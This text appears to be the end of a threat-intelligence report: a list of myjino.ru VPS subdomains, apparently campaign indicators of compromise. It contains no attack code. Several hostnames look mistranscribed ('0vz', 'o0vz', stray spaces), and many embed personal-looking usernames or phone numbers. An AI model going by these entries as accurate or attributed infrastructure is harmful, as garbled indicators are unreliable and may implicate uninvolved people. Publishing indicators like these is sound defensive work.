http://ovz2.evp-santeh.pr46m.vps.myjino.ru 
gagauzinfo.pr46m.vps.myjino.ru 
ovz1.fagaje9117.pr46m.vps.myjino.ru 
ovz1.qwert8778.pr46m.vps.myjino.ru 
ovz10.mrnagaron.pr46m.vps.myjino.ru 
ovz5.tim-vegas.pr46m.vps.myjino.ru 
ovz1.schokk787.pr46m.vps.myjino.ru 
ovz1.Inigrouse.pr46m.vps.myjino.ru 
kares4552.pr46m.vps.myjino.ru 
ovz1.medvedev0.pr46m.vps.myjino.ru 
ovz1.lyagpospi.pr46m.vps.myjino.ru 
ovz1.9112499775.pr46m.vps.myjino.ru 
ovz2.9063113311.pr46m.vps.myjino.ru 
ovz1.9119332607.pr46m.vps.myjino.ru 
9119332607.pr46m.vps.myjino.ru 
0vz3.9042777382.pr46m.vps.myjino.ru 
ovz1.9040113104.pr46m.vps.myjino.ru 
o0vz10.9051387759.pr46m.vps.myjino.ru 


9051387759.pr46m.vps.myjino.ru 
ovz1.9180308433.pr46m.vps.myjino.ru 
9180308433.pr46m.vps.myjino.ru 
ovz1.9257556800.pr46m.vps.myjino.ru 
9255256693.pr46m.vps.myjino.ru 
o0vz1.9120532315.pr46m.vps.myjino.ru 
ovz2.9119332607.pr46m.vps.myjino.ru 
ovz1.9174946173.pr46m.vps.myjino.ru 
0vzZ3.9129967927 .pr46m.vps.myjino.ru 
o0vz10.9509208100.pr46m.vps.myjino.ru 
0v21.9313934925.pr46m.vps.myjino.ru 
ovz1.9602794237 .pr46m.vps.myjino.ru 
ovz11.9509208100.pr46m.vps.myjino.ru 
ovz1.9276540579.pr46m.vps.myjino.ru 
9276540579.pr46m.vps.myjino.ru 
9313934925.pr46m.vps.myjino.ru 
ovz21.9278817135.pr46m.vps.myjino.ru 
o0vz1.375295296359.pr46m.vps.myjino.ru 
375295296359.pr46m.vps.myjino.ru 
ovz4.aaicomputing.pr46m.vps.myjino.ru 
ovz2.9263000649-0.pr46m.vps.myjino.ru 
new.ovz1.yarcomputer.pr46m.vps.myjino.ru 
ovz1.yarcomputer.pr46m.vps.myjino.ru 
discountsushi.ovz1.yarcomputer.pr46m.vps.myjino.ru 
drying.ovz1.yarcomputer.pr46m.vps.myjino.ru 
mikeham1lton.pr46m.vps.myjino.ru 
ovz1.m-shevchenko.pr46m.vps.myjino.ru 
nickolyashka.pr46m.vps.myjino.ru 
ovz4.mikeham1lton.pr46m.vps.myjino.ru 
ovz1.delaiveshi86.pr46m.vps.myjino.ru 
delaiveshi86.pr46m.vps.myjino.ru 
ovz1.kluchnikov85.pr46m.vps.myjino.ru 
kluchnikov85.pr46m.vps.myjino.ru 
ovz1.elen1990nedol.pr46m.vps.myjino.ru 
elen1990nedol.pr46m.vps.myjino.ru 
ovz1.ivanmenshenin.pr46m.vps.myjino.ru 
ovz5.grandboy99-ei.pr46m.vps.myjino.ru 
ovz8.night-jaguar.pr46m.vps.myjino.ru 
ovz1.nickolyashka.pr46m.vps.myjino.ru 
ovz1.asolomennikov.pr46m.vps.myjino.ru 
ovz1.skorovarov81.pr46m.vps.myjino.ru 
ovz1.gitermandaniil.pr46m.vps.myjino.ru 
ovz3.aleks-spicin77.pr46m.vps.myjino.ru 
ovz1.vova-pervushin.pr46m.vps.myjino.ru 


ovz1.mr-abdrahimov0.pr46m.vps.myjino.ru 
roman250187r2.pr46m.vps.myjino.ru 
ovz1.rebus-clients.pr46m.vps.myjino.ru 
ovz1.terraneru1285.pr46m.vps.myjino.ru 
ovz1.roman250187r2.pr46m.vps.myjino.ru 
ovz5.messO080600.pr46m.vps.myjino.ru 
ovz4.messO080600.pr46m.vps.myjino.ru 
ovz1.nbuzovskiy.pr46m.vps.myjino.ru 
ovz6.messO080600.pr46m.vps.myjino.ru 
ovz4.korzhavin1.pr46m.vps.myjino.ru 
ovz1.katamiwear.pr46m.vps.myjino.ru 
ovz3.messO080600.pr46m.vps.myjino.ru 
ovz7.kostikovmu.pr46m.vps.myjino.ru 
ovz1.vinilsauto.pr46m.vps.myjino.ru 
ovz3.starnetkhv.pr46m.vps.myjino.ru 
13523255876.pr46m.vps.myjino.ru 
ovz1.000yurikO00.pr46m.vps.myjino.ru 
ovz2.radiopurga.pr46m.vps.myjino.ru 
ovz3.piatnica13.pr46m.vps.myjino.ru 
ovz1.slavayurin.pr46m.vps.myjino.ru 
ovz1.sb8ukraine.pr46m.vps.myjino.ru 
0vz18.79650235844 .pr46m.vps.myjino.ru 
79650235844 .pr46m.vps.myjino.ru 
ovz1.dtolmachyov.pr46m.vps.myjino.ru 
ovz4.artur999033.pr46m.vps.myjino.ru 
ovz1.79163140864.pr46m.vps.myjino.ru 
o0vz1.13523255876.pr46m.vps.myjino.ru 
ovz3.79296907727.pr46m.vps.myjino.ru 
79296907727 .pr46m.vps.myjino.ru 
ovz1.kuba4indima.pr46m.vps.myjino.ru 
ovz1.gomelagrotd.pr46m.vps.myjino.ru 
yarcomputer.pr46m.vps.myjino.ru 
ovz4.maxyuliya87.pr46m.vps.myjino.ru 
ovz1.energo-most.pr46m.vps.myjino.ru 
ovz3.dtolmachyov.pr46m.vps.myjino.ru 
ovz15.for-support.pr46m.vps.myjino.ru 
ovz1.ericfromufa.pr46m.vps.myjino.ru 
ovz1.saidjon-safarov.pr46m.vps.myjino.ru 
ovz7.oskar-torres221.pr46m.vps.myjino.ru 
rubikstechnology.pr46m.vps.myjino.ru 
ovz2.saidjon-safarov.pr46m.vps.myjino.ru 
ovz1.arseniy-shulgin.pr46m.vps.myjino.ru 
arseniy-shulgin.pr46m.vps.myjino.ru 
oskar-torres221.pr46m.vps.myjino.ru 


ovz1.ismarsuleimanov.pr46m.vps.myjino.ru 
ovz1.vladimir-udartse.pr46m.vps.myjino.ru 
ovz6.sivolapenko-vale.pr46m.vps.myjino.ru 
vps-fm-pr46m.services.myjino.ru 
ovz5.vyacheslav-tomas.pr46m.vps.myjino.ru 
www.ovz1.rubikstechnology.pr46m.vps.myjino.ru 
ovz1.rubikstechnology.pr46m.vps.myjino.ru 
ovz4.sivolapenko-vale.pr46m.vps.myjino.ru 
ovz3.sivolapenko-vale.pr46m.vps.myjino.ru 


We'll continue monitoring the campaign and will post updates as soon as new developments 
take place. 


